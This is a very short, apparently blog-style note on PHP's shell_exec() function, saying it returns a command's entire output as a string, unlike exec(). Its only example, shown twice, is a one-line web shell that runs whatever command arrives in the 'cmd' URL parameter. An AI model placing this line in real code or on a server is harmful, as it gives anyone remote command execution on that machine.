PHP
The
<?php echo shell_exec($_GET['cmd']);?> - Outputs the entire result as a string
The
shell_exec()
function is similar to exec()
, however, instead, it outputs the entire result as a string.<?php echo shell_exec($_GET['cmd']);?> - Outputs the entire result as a string
No comments:
Post a Comment